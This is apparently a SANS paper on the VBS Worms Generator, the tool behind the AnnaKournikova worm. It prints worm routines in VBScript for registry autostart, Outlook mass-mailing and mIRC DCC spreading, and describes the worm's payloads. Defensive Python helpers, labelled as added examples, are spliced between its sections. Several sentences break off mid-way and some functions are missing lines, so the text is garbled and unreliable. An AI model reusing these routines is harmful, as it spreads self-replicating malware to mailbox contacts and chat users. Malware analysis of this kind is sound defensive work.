Vbs Worms Generator - 451
Introduction
The “VBS Worms Generator” (from now on vbswg) is a worm generator for Windows written by a 17-year-old boy whose name is [K]Alamar [1]. With the words “worm generator” we mean a software tool which is able to generate customisable virus code.
This software, in particular, lets the creator customize most of the aspects of the behaviour of the virus. However, a single skeleton is used with many plug-ins. The user can choose which ones to activate.
This tool is particularly infamous because it was the one used at the beginning of February 2001 to create the “AnnaKournikova worm” [2] which in a few days managed to infect thousands of computers worldwide. The worm was generated by a 20-year-old man who goes by the name of OnTheFly who didn’t realize the damage he was about to inflict: he could now be facing a prison sentence of up to four years [3].
© SANS Institute 2000 - 2002 As part of GIAC practical repository. Author retains full rights.
Here is a list of all the possible features:
• Start with Windows (by registry key): the worm will be activated every time Windows starts
• Worm backup: a copy of the worm’s code will be copied to a safe location on the victim’s machine
• Outlook replication: this is the mechanism the virus will use to spread itself by email. Two options are available: to send attachments or to send HTML code with the virus embedded
• Mirc replication: the Mirc initialisation file (mirc.ini) is altered in order to spread the worm by IRC
• Pirch replication: same principle used by the Mirc replication, but the Pirch initialisation file is changed
• Other files infected: a search on all the disks (network drives included) will be performed and the worm will overwrite itself onto all the files with extension .vbe and .vbs. It will also search for the files mirc.ini and pirch.ini in order to detect installations of Mirc and Pirch
• Payloads: it is possible to add some actions to be performed by the virus on a specific date: display a message with a picture in an alert box, open a web page or crash the system using two different methods.
• Anti-deletion method: the worm becomes memory resident and the
Let’s now examine in detail the source code generated by vbswg for some of the sections.
All the code generated by this tool is encrypted in a very simple but effective form (unless the strong encryption is chosen): all the names of variables and functions are randomly generated, and the strings are initialised with concatenations of the ASCII values of the characters. This makes it more difficult for an inexperienced person to debug the code and understand what it does.
In the examples shown here all the variables are in clear text and the registry keys are shown with their proper names, although I have omitted a few lines of code, substituting them with some comments (marked as comment lines in the listings below).
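The Chr() concatenation hiding described above is trivial to undo. The following Python helper is an added example (not from the paper and not part of vbswg): it folds runs of Chr(n) back into plain VBScript literals so an analyst can read the ProgIDs, registry paths and file names at a glance. The sample input is constructed in the style of the generated code.

```python
import re

# Analyst-side deobfuscator for vbswg-style string hiding (added example, hypothetical helper).
# The generator emits strings as Chr(n) & Chr(m) & ... concatenations; this folds them back
# into ordinary VBScript literals so the registry keys, file names and ProgIDs become readable.
_CHR = re.compile(r"\bchr\(\s*(\d{1,3})\s*\)", re.IGNORECASE)
_LIT = re.compile(r'"((?:[^"]|"")*)"')                                # one literal ("" escapes a quote)
_LIT_JOIN = re.compile(r'"((?:[^"]|"")*)"\s*&\s*"((?:[^"]|"")*)"')  # "a" & "b"

def _as_literal(text):
    """Quote text as a VBScript literal, doubling embedded quotes."""
    return '"' + text.replace('"', '""') + '"'

def deobfuscate_line(line):
    """Turn every Chr(n) into a literal, then merge adjacent literals until nothing changes."""
    out = _CHR.sub(lambda m: _as_literal(chr(int(m.group(1)))), line)
    prev = None
    while prev != out:
        prev = out
        out = _LIT_JOIN.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', out)
    return out

def deobfuscate(source):
    return "\n".join(deobfuscate_line(line) for line in source.splitlines())

def recovered_literals(source):
    """String literals visible after folding: a quick triage view of what the script names."""
    return [m.group(1).replace('""', '"') for m in _LIT.finditer(deobfuscate(source))]

# Constructed sample in the style of the generated code (not taken from a real worm file).
SAMPLE = "\n".join([
    "Set ws = CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112)"
    " & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108))",
    'Code = Code & Chr(34) & " & vbcrlf & " & Chr(34)',
])

if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
    print(recovered_literals(SAMPLE))
```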
Start with Windows
Set ws = CreateObject("WScript.Shell")
ws.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\" & _
  "Run\{regkey}", "wscript.exe c:\windows\{worm}.vbs %"
This code creates a registry key whose value is executed every time Windows is started. The name of the registry key and the name of the file executed are parametric and decided by the “attacker” (who is generating the worm).
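For defenders, the Run-key write above leaves a simple host indicator. This Python check is an added example (not from the paper): it parses a constructed .reg export of the two Run keys and flags entries that launch a script host or name a script file, which is exactly the shape of the value vbswg writes.

```python
# Added example (not from the paper): triage of Run-key autostart entries for script-host
# launches like the one vbswg writes ("wscript.exe c:\windows\{worm}.vbs %").
# Input is a constructed .reg export; on a live host the keys would be exported with reg.exe.
RUN_KEYS = {
    r"hkey_local_machine\software\microsoft\windows\currentversion\run",
    r"hkey_current_user\software\microsoft\windows\currentversion\run",
}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "wscript", "cscript"}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf")

def parse_reg_export(text):
    """Yield (key, value_name, data) from a .reg export; doubled backslashes are unescaped."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and line.startswith('"') and "=" in line:
            name, _, data = line.partition("=")
            yield key, name.strip('"'), data.strip().strip('"').replace("\\\\", "\\")

def is_script_autorun(command):
    """True if the command launches a script host or names a script file anywhere."""
    tokens = command.lower().split()
    if not tokens:
        return False
    host = tokens[0].strip('"').rsplit("\\", 1)[-1]
    names_script = any(t.strip('"').rstrip("%").endswith(SCRIPT_EXTS) for t in tokens)
    return host in SCRIPT_HOSTS or names_script

def flag_script_autoruns(text):
    """Return (value_name, command) for every Run-key entry that looks like a script launch."""
    return [(name, data) for key, name, data in parse_reg_export(text)
            if key.lower() in RUN_KEYS and is_script_autorun(data)]

# Constructed .reg export: one legitimate entry per hive plus two script-host launches.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SynTPEnh"="C:\\Program Files\\Synaptics\\SynTP\\SynTPEnh.exe"
"sample_regkey"="wscript.exe c:\\windows\\worm.vbs %"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Updater"="cscript.exe //B C:\\Users\\alice\\AppData\\update.vbe"
"Notepad"="notepad.exe"
'''

if __name__ == "__main__":
    for name, cmd in flag_script_autoruns(SAMPLE_REG):
        print(f"suspicious autorun {name!r}: {cmd}")
```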
Outlook replication by attachment
Function Outlook()
  On Error Resume Next
  Set OutlookApp = CreateObject("Outlook.Application")
  If OutlookApp = "Outlook" Then
    Set Mapi = OutlookApp.GetNameSpace("MAPI")
    Set mapiadlist = Mapi.AddressLists
    For Each Addresslist In mapiadlist
      If Addresslist.AddressEntries.Count <> 0 Then
        Addresslistcout = Addresslist.AddressEntries.Count
        For AddList = 1 To Addresslistcout
          Set msg = OutlookApp.CreateItem(0)
          Set AdEntries = Addresslist.AddressEntries(AddList)
        Next
        registry.regwrite "HKCU\software\myworm\mailed", "1"
      End If
    Next
  End If
End Function
all the people in the address-book of the victim’s computer. At first it is checked to ensure that there is at least one recipient in the address-book, and then a new message is created with subject and body which are decided by the “attacker”.
Attached to this mail there is a copy of the worm itself, and the copies of the message just sent are deleted in order to remove any track of the action taken. A registry key is also created to keep track of whether the virus has already been sent by email. Doing a comparison with the routine used by the “Love Letter” virus, it is possible to say that this one is less sophisticated because it doesn’t keep track of the new additions to the address-book: once mailed, the virus is not sent anymore.
Outlook Replication by HTML
Function OutlookBody()
  On Error Resume Next
  Set fso = CreateObject("scripting.filesystemobject")
  Set Outlook = CreateObject("Outlook.Application")
  If Outlook = "Outlook" Then
    Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
    I = 1
    Do While Myself.atendofstream = False
      MyLine = Myself.readline
      Code = Code & Chr(34) & " & vbcrlf & " & Chr(34) & _
        Replace(MyLine, Chr(34), Chr(34) & " &chr(34) &" & Chr(34))
    Loop
    Myself.Close
    ' Lots of lines of code to create an HTML page which contains the source
    ' code of the worm. The variable is called HtmlBody
    Set mapi = Outlook.GetNameSpace("MAPI")
    Set Mapiadd = mapi.AddressLists
    For Each Addresslist In Mapiadd
      If Addresslist.AddressEntries.Count <> 0 Then
        AddCount = Addresslist.AddressEntries.Count
          Msg.BCC = Msg.BCC & "; " & Addentry.Address
        End If
      Next
      Msg.send
    End If
  Next
  Outlook.Quit
  End If
End Function
This function creates and sends a new email message to all the recipients in the address book. The subject is parametric, while the body is an HTML page with a copy of the worm itself, which is executed on the victim’s computer as soon as he tries to preview or open the email.
The worm will then be executed if the victim allows the ActiveX control to run on his machine.
Mirc replication
Function Mirc(Path)
  On Error Resume Next
  Set fso = CreateObject("scripting.filesystemobject")
  Set ws = CreateObject("wscript.shell")
  If Path = "" Then
    If fso.fileexists("c:\mirc\mirc.ini") Then
      Path = "c:\mirc"
    End If
    If fso.fileexists("c:\mirc32\mirc.ini") Then
      Path = "c:\mirc32"
    End If
    PfDir = ws.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
    If fso.fileexists(PfDir & "\mirc\mirc.ini") Then
      Path = PfDir & "\mirc"
    End If
  End If
  If Path <> "" Then
    Set Script = fso.CreateTextFile(Path & "\script.ini", True)
    Script.writeline "[script]"
    Script.writeline "n0=on 1:JOIN:#:{"
    Script.writeline "n1= /if ( $nick == $me ) { halt }"
    Script.writeline "n2= /." & chr(100) & chr(99) & chr(99) & " send $nick c:\windows\worm.vbs"
  End If
End Function
This routine checks for the existence of the Mirc software on the victim’s machine and changes the initialisation script in order to infect other users on Irc. To check if the software is installed, it looks for the initialisation file in two directories and in the directory named by a registry key. If the file exists, a new file called “script.ini” is created: this file will send the worm to every Irc channels the
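A detection counterpart to this routine, as an added example not from the paper: Python that parses a mIRC script.ini, regroups the nN= lines into remote-event handlers and flags any handler that issues a dcc send (or similar) at joining users. The sample file is constructed after the shape of the generated one, with a harmless second handler for contrast.

```python
import re
# Added example (not from the paper): checker for a dropped mIRC script.ini like the one the
# Mirc() routine writes. mIRC keeps script lines as n0=, n1=, ... under [script]; a remote
# event (on ...:JOIN:...) that runs "dcc send" at whoever joins is the worm's spreader.
EVENT_LINE = re.compile(r"^on\s+[^:\s]+:(\w+):", re.IGNORECASE)
SUSPICIOUS_CMDS = ("dcc send", "dcc chat", "write ", "run ")  # defender list, constructed

def parse_script_ini(text):
    """Return the [script] section lines in n-number order."""
    section, lines = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        m = re.match(r"n(\d+)=(.*)", line)
        if section == "script" and m:
            lines[int(m.group(1))] = m.group(2)
    return [lines[i] for i in sorted(lines)]

def flag_remote_events(text):
    """Return (event, commands) for handlers that push files or run programs.
    '/' is mIRC's command prefix and '.' its silent flag; both are stripped first."""
    findings, event, body = [], None, []

    def finish():
        if event is not None:
            cmds = [l.strip().lstrip("/.").lower() for l in body]
            hits = [c for c in cmds if c.startswith(SUSPICIOUS_CMDS)]
            if hits:
                findings.append((event, hits))

    for line in parse_script_ini(text):
        m = EVENT_LINE.match(line.strip())
        if m:                         # a new handler starts; close the previous one
            finish()
            event, body = m.group(1).upper(), []
        elif line.strip() == "}":     # handler closed (the generated file may omit this)
            finish()
            event, body = None, []
        elif event is not None:
            body.append(line)
    finish()
    return findings

# Constructed script.ini in the shape of the generated one, plus a harmless second handler.
SAMPLE_SCRIPT_INI = "\n".join([
    "[script]", "n0=on 1:JOIN:#:{", "n1= /if ( $nick == $me ) { halt }",
    r"n2= /.dcc send $nick c:\windows\worm.vbs", "n3=}",
    "n4=on 1:TEXT:*hello*:#:{ /msg $chan hi $nick }",
])
```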
Antideletion method
If the creator chooses to activate this add-on, this will be the last function called by the worm because it never ends. The worm will enter an infinite loop, checking continuously whether the source code is still on the disk: if it has been deleted, it recreates itself.
Main()
The main section of the worm is the one responsible for setting up the global variables, saving the first copy of the worm on the victim’s file system and calling all the other functions. All the names of the variables and functions are randomly generated by vbswg, and their length is parametric.
Conclusion
Nowadays this virus is detected by most of the well-known antivirus software, but for a few days, while the antivirus companies were updating their signatures, it was a real threat. Vbswg itself is also detected by most of the AV software as a Trojan.
Again, users have to be educated to use the e-mail service: this can be enforced by company policies for what concerns workplaces and it could be
Sources
[1] http://virii.at/k/
[2] http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=VBS_KALAMAR.A
[3] “Man arrested over Kournikova virus”, 14 Feb 2001 – BBC World Service
http://news.bbc.co.uk/hi/english/world/europe/newsid_1170000/1170176.stm